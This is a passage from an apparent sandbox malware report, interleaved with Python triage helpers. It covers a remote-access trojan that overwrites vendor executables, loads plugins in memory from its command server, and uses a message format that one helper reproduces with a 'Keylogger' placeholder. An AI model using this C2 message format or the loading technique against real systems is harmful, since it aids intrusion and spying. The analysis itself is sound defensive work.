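# Chosen groupings (an assumption for this demo, not a Joe Sandbox taxonomy).
DLL_GROUPS = {
    "amsi":    {"amsi.dll"},
    "wldp":    {"wldp.dll"},
    "cim_wmi": {"mi.dll", "miutils.dll", "wmidcom.dll", "wbemcomn.dll",
                "microsoft.management.infrastructure.native.unmanaged.dll"},
    "crypto":  {"cryptsp.dll", "rsaenh.dll", "cryptbase.dll", "dpapi.dll"},
    "network": {"wininet.dll", "urlmon.dll", "netutils.dll", "srvcli.dll"},
}

# Constructed sample lines in the report's format (one duplicate on purpose).
SAMPLE_REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Users\user\Desktop\x.exeSection loaded: version.dll
"""


def parse_section_loads(text):
    """Group loaded-module names by source image, first-seen order, no repeats."""
    loads = OrderedDict()
    for line in text.splitlines():
        m = LOAD_RE.search(line)
        if not m:
            continue
        image, dll = m.group("image"), m.group("dll").lower()
        seen = loads.setdefault(image, [])
        if dll not in seen:
            seen.append(dll)
    return loads


def classify_loads(dlls):
    """Return only the groups that matched, each with its sorted member DLLs."""
    groups = {}
    for name, members in DLL_GROUPS.items():
        matched = sorted(d for d in dlls if d in members)
        if matched:
            groups[name] = matched
    return groups


def triage(text):
    """Per image: matched groups plus a hint that a PowerShell host ran a
    CIM-backed cmdlet (the mechanism behind the MpPreference cmdlets)."""
    result = {}
    for image, dlls in parse_section_loads(text).items():
        groups = classify_loads(dlls)
        is_powershell = image.lower().endswith("powershell.exe")
        result[image] = {
            "groups": groups,
            "defender_cim_hint": is_powershell and "cim_wmi" in groups,
        }
    return result


if __name__ == "__main__":
    for image, info in triage(SAMPLE_REPORT_LINES).items():
        print(image, info)
```

Run it over the full "Section loaded" block of a report to collapse the hundreds of lines into one summary per image; the hint only says that CIM was used inside PowerShell, so pair it with the decoded command line before calling it a Defender exclusion.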
                              Source: C:\Users\user\Desktop\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: Window Recorder | Window detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdb source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: armsvc.exe.0.dr
                              Source: Binary string: mpextms.pdb source: mpextms.exe0.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdbOGP source: identity_helper.exe.0.dr
                              Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb source: Common.DBConnection64.exe.0.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdb source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: MicrosoftEdgeUpdate.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb source: Microsoft.Mashup.Container.Loader.exe.3.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb source: integrator.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.0.dr
                              Source: Binary string: r.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: integrator.exe.0.dr
                              Source: Binary string: VSTOInstaller.pdb source: VSTOInstaller.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SDXHelper.exe.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdbOGP source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\a\_work\1\s\src\ai\windows\dll\x64\Release\aimgr.pdb source: aimgr.exe.3.dr
                              Source: Binary string: AppVDllSurrogate32.pdb source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdbh source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: AppVDllSurrogate32.pdbGCTL source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb source: WINWORD.EXE.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: WINWORD.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.0.dr
                              Source: Binary string: lper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.0.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: DATABASECOMPARE.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdb source: identity_helper.exe.0.dr
                              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\mini_installer.exe.pdb source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.0.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.0.dr
                              Source: Binary string: mpextms.pdbGCTL source: mpextms.exe0.0.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb.. source: Microsoft.Mashup.Container.Loader.exe.3.dr
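A caveat on the PDB list above: the ".dr" suffix marks files the sample dropped or wrote, and these paths are the build paths of the legitimate Edge, Office, Adobe ARM, JDK and Defender executables that were overwritten under Program Files and the Windows directory, not the malware's own symbols. They are useful for scoping the infection (which vendor trees were touched), not for attributing the sample. The suffixes such as "GCTL", "OGP", "<<7" and the long runs of zeros are bytes adjacent to the path in the file that the string extractor pulled into the same hit, which is why several files appear twice. The following is an added example, not part of the report: it normalises the report lines, drops fragments, attributes each path to a build tree using prefixes taken from the paths on this page, and, for the case where the file itself is available, reads the CodeView RSDS record directly so the path ends at its terminator. The sample lines are copied from this report; the RSDS blob, its GUID and path are constructed.

```python
import re
import struct
import uuid
from collections import defaultdict

# Lines copied from the report's "Binary string" list (including noisy variants).
SAMPLE_PDB_LINES = r"""
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.3.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.3.dr
Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.0.dr
Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.0.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb000000000000000S source: WINWORD.EXE.0.dr
Source: Binary string: r.pdb source: AppSharingHookController64.exe.3.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.0.dr
"""

LINE_RE = re.compile(r"Binary string:\s*(?P<raw>.+?)\s+source:\s*(?P<file>\S+)\s*$")
PDB_END = re.compile(r"\.pdb", re.IGNORECASE)

# Heuristic build-root prefixes, taken from the paths listed in this report.
BUILD_ROOTS = {
    "d:\\a\\_work\\e\\src\\out\\": "Microsoft Edge (Chromium) build tree",
    "d:\\dbs\\el\\": "Microsoft Office build tree",
    "c:\\jenkins\\workspace\\8-2-build-windows": "Oracle JDK 8 build",
    "d:\\dcb\\cbt_main\\": "Adobe ARM build",
}


def clean_pdb_path(raw):
    """Cut at the first '.pdb'; anything after it is adjacent file content."""
    m = PDB_END.search(raw)
    return raw[: m.end()] if m else raw


def is_fragment(path):
    """No directory part and a very short stem (e.g. 'r.pdb', 'lper.pdb') is the
    tail of a longer string the extractor split, not a real PDB name. The
    five-character threshold is a chosen heuristic."""
    stem = path.rsplit("\\", 1)[-1][:-4]
    return "\\" not in path and len(stem) < 5


def vendor_hint(path):
    low = path.lower()
    for prefix, name in BUILD_ROOTS.items():
        if low.startswith(prefix):
            return name
    return "unknown"


def summarize_pdb_hits(text):
    """Map each dropped/written file to its distinct, cleaned PDB paths."""
    hits = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        path = clean_pdb_path(m.group("raw").strip())
        if not is_fragment(path):
            hits[m.group("file")].add(path)
    return {k: sorted(v) for k, v in hits.items()}


def parse_rsds(blob):
    """Read CodeView 'RSDS' records (signature, GUID, age, NUL-terminated path)
    straight from file bytes; unlike a strings pass this stops at the terminator."""
    out = []
    pos = blob.find(b"RSDS")
    while pos != -1 and pos + 24 <= len(blob):
        guid = uuid.UUID(bytes_le=blob[pos + 4:pos + 20])
        (age,) = struct.unpack_from("<I", blob, pos + 20)
        end = blob.find(b"\x00", pos + 24)
        path = blob[pos + 24:(len(blob) if end == -1 else end)].decode("latin-1")
        out.append((str(guid), age, path))
        pos = blob.find(b"RSDS", pos + 24)
    return out


# Constructed stand-in for a debug-directory payload; GUID and path are made up,
# and "GCTL" follows the path the way the noisy report hits suggest.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_BLOB = (b"\x90" * 7 + b"RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 3)
               + b"D:\\build\\out\\example_helper.exe.pdb\x00" + b"GCTL" + b"\x00" * 8)

if __name__ == "__main__":
    for dropped, paths in summarize_pdb_hits(SAMPLE_PDB_LINES).items():
        print(dropped, [(p, vendor_hint(p)) for p in paths])
    print(parse_rsds(SAMPLE_BLOB))
```

The summary collapses the duplicated hits to one path per file and tells you which vendor directories to sweep; for an actual infected file, prefer parse_rsds (or a full PE parser's debug directory) over the string hit when you need the exact path or the GUID/age pair for symbol lookup.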

                              Data Obfuscation

                              Source: x.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: x.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                              Source: x.exe.0.dr, Messages.cs | .Net Code: Memory
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs | .Net Code: Memory
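The decompiled lines above are the client's plugin path: a C2 message is split on the configured separator (Settings.SPL) into Pack[], Pack[2] names the plugin or command, Pack[3] carries a base64 string that Helper.Decompress turns back into an assembly, and that byte array goes into System.AppDomain.Load(byte[]) so the plugin never touches disk; the late-bound "Invoke" then hands the plugin the client's Host, Port, SPL, KEY and ID. The following is an added example, not code from the sample or the report, showing both sides of that exchange in Python so a captured message can be carved: gzip is assumed for Helper.Decompress, the separator value "<Xwormmm>" is assumed for the demo, fields 0 and 1 are not shown on this page and are filled with placeholders, and the plugin bytes are a constructed stand-in with a PE header and a "BSJB" .NET metadata signature.

```python
import base64
import gzip

# Assumed separator: the message is split on Settings.SPL, whose value is not on
# this page; this string is used only so the demo round-trips.
SPL = "<Xwormmm>"

# Constructed stand-in for a plugin assembly: DOS header pointing at offset 0x80,
# a PE signature there, and the "BSJB" .NET metadata signature further on.
FAKE_ASSEMBLY = (b"MZ" + b"\x00" * 58 + (0x80).to_bytes(4, "little") + b"\x00" * 64
                 + b"PE\x00\x00" + b"\x00" * 20 + b"BSJB" + b"\x00" * 16)


def build_plugin_message(plugin_name, assembly, spl=SPL):
    """Compose the message in the shape the decompiled reader consumes:
    Pack[2] = plugin name, Pack[3] = base64(gzip(assembly)). Fields 0 and 1
    are placeholders (their meaning is not shown on this page)."""
    packed = base64.b64encode(gzip.compress(assembly)).decode("ascii")
    return spl.join(["plugin", "0", plugin_name, packed])


def parse_plugin_message(message, spl=SPL):
    """Reverse of Helper.Decompress(Convert.FromBase64String(Pack[3])), with the
    error handling a carving tool needs when fed untrusted captures."""
    pack = message.split(spl)
    if len(pack) < 4:
        raise ValueError("fewer than four fields; not a plugin-delivery message")
    try:
        raw = base64.b64decode(pack[3], validate=True)
    except ValueError as exc:            # binascii.Error is a ValueError subclass
        raise ValueError(f"field 3 is not base64: {exc}") from exc
    try:
        assembly = gzip.decompress(raw)
    except (OSError, EOFError) as exc:   # gzip.BadGzipFile is an OSError subclass
        raise ValueError(f"field 3 did not decompress as gzip: {exc}") from exc
    return {
        "opcode": pack[0],
        "name": pack[2],
        "assembly": assembly,
        "is_pe": assembly[:2] == b"MZ",
        "is_dotnet": b"BSJB" in assembly,   # .NET metadata header signature
        "size": len(assembly),
    }


if __name__ == "__main__":
    msg = build_plugin_message("Keylogger", FAKE_ASSEMBLY)
    info = parse_plugin_message(msg)
    print(info["name"], info["size"], info["is_pe"], info["is_dotnet"])
```

Because the assembly is loaded from memory, the plugin only exists in the C2 stream and in the process: carve it from a decrypted capture with parse_plugin_message, or dump the managed heap of the client process, rather than hunting for a dropped DLL.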
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045D629D push eax; ret 4_2_045D6351
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045D2C85 push 04B8074Bh; retf 4_2_045D2CEE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A11C5 push esp; retn 0000h 19_2_045A11D9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A11F5 push esp; retn 0000h 19_2_045A11D9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A629D push eax; ret 19_2_045A6351
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A0B55 push esi; retn 0000h 19_2_045A0B8A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_045A0BC1 push edi; retn 0000h 19_2_045A0BC2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_0537636D push eax; ret 25_2_05376381
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_053762CD push eax; ret 25_2_05376381
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA569D push esi; retf 0007h 25_2_07CA569E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA4E90 push eax; retf 0007h 25_2_07CA500E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA0CE8 push cs; retf 0007h 25_2_07CA0E0E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA1BE0 push ds; retf 0007h 25_2_07CA1EE6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA528D push edx; retf 0007h 25_2_07CA528E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_07CA5000 push eax; retf 0007h 25_2_07CA500E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98CDF pushad ; retf 0008h 25_2_08F98DDA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F97CAF push eax; retf 0008h 25_2_08F97CBA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98C44 push esi; retf 0008h 25_2_08F98C5A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98C3F pushad ; retf 0008h 25_2_08F98DDA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98C2F push ebp; retf 0008h 25_2_08F98C3A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98DDF pushad ; retf 0008h 25_2_08F98DEA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F97E1C push eax; iretd 25_2_08F97E22
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F96608 push cs; retf 0008h 25_2_08F96612
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98BDF push ecx; retf 0008h 25_2_08F98BEA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F98BC5 push edx; retf 0008h 25_2_08F98C1A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_08F97B0F push esp; retf 0008h 25_2_08F97B19

                              Persistence and Installation Behavior

                              Source: Yara match | File source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Windows\svchost.com
                              Source: C:\Users\user\Desktop\x.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                              Source: C:\Users\user\Desktop\x.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Executable created and started: C:\Windows\svchost.com
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
